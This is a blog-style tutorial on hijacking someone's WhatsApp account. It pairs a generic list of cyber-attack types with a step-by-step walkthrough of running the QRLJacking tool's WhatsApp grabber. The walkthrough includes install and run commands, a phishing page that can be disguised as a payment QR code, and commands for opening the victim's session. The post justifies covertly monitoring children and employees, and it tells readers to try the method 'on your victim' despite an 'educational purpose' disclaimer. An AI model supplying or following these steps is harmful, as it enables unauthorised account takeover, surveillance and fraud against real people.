Whatsapp Hacking! Social Engineering Example

What is Hacking?

A security hacker is someone who explores methods for breaching defenses and exploiting weaknesses in a computer system or network. In short, breaking the weakness of computer system/security can be referred as hacking.

Why Do You Need to Hack Someone’s WhatsApp?

Monitoring the activity of WhatsApp enables you to understand the truth behind someone. If you are a parent, you can check whether your children are safe. In addition, you can check if they are being bullied or keep in touch with strangers. If you are an employer who thinks your employees are selling company secrets, you can monitor their WhatsApp to find the truth.

 

1. Protect Your Children

Kids often use WhatsApp to chat with netizens, and you cannot be sure whether these netizens will be harmful to your kids. So you need to hack WhatsApp to check your children ’s chat history and make sure your children are not in danger.

 

2. Monitor Your Employees

Some employees use social apps to chat with family or friends during work hours. As an employer, you need to ensure the efficiency of your employees. Hacking employees ’chat messages on social apps like WhatsApp to find out whether employees are lazy or have revealed company secrets.

Top 10 most common types of cyber attacks are:

1. Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks
2. Man-in-the-middle (MitM) attack
3. Phishing and spear phishing attacks
4. Drive-by attack
5. Password attack
6. SQL injection attack
7. Cross-site scripting (XSS) attack
8. Eavesdropping attack
9. Birthday attack
10. Malware attack

What is Phishing:

Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords and credit card details, by disguising oneself as a trustworthy entity in an electronic communication 

Typically carried out by email spoofing instant messaging and text messaging, phishing often directs users to enter personal information at a fake website which matches the look and feel of the legitimate site.

WhatsApp Hacking is possible?

Yes, it is possible

How can be WhatsApp Hacked?

Using social engineering

Social engineering is the psychological manipulation of people into performing actions or divulging confidential information.

Example of social engineering:

Consider this example of spear phishing that convinced an employee to transfer $500,000 to a foreign investor:

 

1. Thanks to careful spear phishing research, the cybercriminal knows the company CEO is traveling.
2. An email is sent to a company employee that looks like it came from the CEO. There is a slight discrepancy in the email address – but the spelling of the CEO’s name is correct.
3. In the email, the employee is asked to help the CEO out by transferring $500,000 to a new foreign investor. The email uses urgent yet friendly language, convincing the employee that he will be helping both the CEO and the company.
4. The email stresses that the CEO would do this transfer herself but since she is travelling, she can’t make the fund transfer in time to secure the foreign investment partnership.
5. Without verifying the details, the employee decides to act. He truly believes that he is helping the CEO, the company, and his colleagues by complying with the email request.
6. A few days later, the victimized employee, CEO, and company colleagues realize they have been a victim of a social engineering attack and have lost $500,000.

 

Technique to hack WhatsApp:

We will use QRLJacking tool

QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker’s QR code which results in session hijacking.

Pre-requisites:

1. Any Linux Distribution such as Ubuntu, Kali, Fedora, etc
2. Python 3.7 

Steps to hack WhatsApp:

Open terminal in linux

Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :

• chmod +x geckodriver
• sudo mv -f geckodriver /usr/local/share/geckodriver
• sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
• sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

Now Type in Terminal:

• git clone https://github.com/OWASP/QRLJacking.git
• cd QRLJacking/QRLJacker
• pip install -r requirements.txt
• python3 QrlJacker.py –help 
• python3 QrlJacker.py (run python file)

1.             Now new window appears of terminal, type:

• use grabber/whatsapp
• set port 1337        (set to default port i.e 1337)
• run                       (wait for some minute, this process takes time)

1.     Open your browser and type in your search bar:

        0.0.0.0:1337

A page with QR code appears on it.

Victim should scan the QR code.

Note: You can change the page design to another page using the QRLJacking\QRLJacker\core\templates\ phishing_page.html you want

1.     Once the victim scans QR code, type:

• sessions   (this will list the sessions you are connected to)
• sessions -i 0 (this will open victims WhatsApp on browser)

and BOOM….You just logged in into victims WhatsApp. 

To terminate (logout)from the sessions type in terminal:

            jobs -K     (logout from WhatsApp )

You can convert the phishing_page.html to any other page such as Paytm scanning code, or phone pay scanning code. Just convince victim to scan the QR code.

Note: This post is only for educational purpose. Everything will not be spoonfed ,try to apply it on your own on your victim. 

Thanks for reading and give it a try

Comment below how was the tutorial and should I continue these type of post?